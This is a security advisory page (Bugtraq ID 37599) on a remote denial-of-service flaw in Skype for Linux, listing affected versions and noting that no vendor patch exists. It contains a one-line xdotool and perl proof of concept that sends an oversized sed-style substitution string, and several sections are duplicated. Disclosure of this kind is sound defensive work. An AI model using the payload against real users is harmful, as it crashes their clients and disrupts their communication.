Skype Technologies Skype for Linux SED Remote Denial of Service Vulnerability
BID:37599
Info
Skype Technologies Skype for Linux SED Remote Denial of Service Vulnerability
| Bugtraq ID: | 37599 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 05 2010 12:00AM |
| Updated: | Jan 05 2010 12:00AM |
| Credit: | emgent and crossbower |
| Vulnerable: |
Skype Technologies Skype (Linux) 1.2 .0.17 Skype Technologies Skype (Linux) 1.1 .0.20 Skype Technologies Skype (Linux) 2.1 beta Skype Technologies Skype (Linux) 1.0.0.7 Skype Technologies Skype (Linux) 1.0.0.1 Skype Technologies Skype (Linux) 0.93.0.3 Skype Technologies Skype (Linux) 0.92.0.12 |
| Not Vulnerable: | |
Discussion
Skype Technologies Skype for Linux SED Remote Denial of Service Vulnerability
Skype is prone to a remote denial-of-service vulnerability.
Successful exploits allow remote attackers to consume excessive resources, requiring a restart of the affected application.
Skype 2.1 beta for Linux is vulnerable; other versions may also be affected.
Skype is prone to a remote denial-of-service vulnerability.
Successful exploits allow remote attackers to consume excessive resources, requiring a restart of the affected application.
Skype 2.1 beta for Linux is vulnerable; other versions may also be affected.
Exploit / POC
Skype Technologies Skype for Linux SED Remote Denial of Service Vulnerability
The following example using 'xdotool' is available:
sleep 5 && xdotool type 's/../' && xdotool type "`perl -e "print 'S 'x44801"`" && xdotool type '/' && xdotool key Return
The following example using 'xdotool' is available:
sleep 5 && xdotool type 's/../' && xdotool type "`perl -e "print 'S 'x44801"`" && xdotool type '/' && xdotool key Return
Solution / Fix
Skype Technologies Skype for Linux SED Remote Denial of Service Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Skype Technologies Skype for Linux SED Remote Denial of Service Vulnerability
References:
References:
- Skype Homepage (Skype Technologies)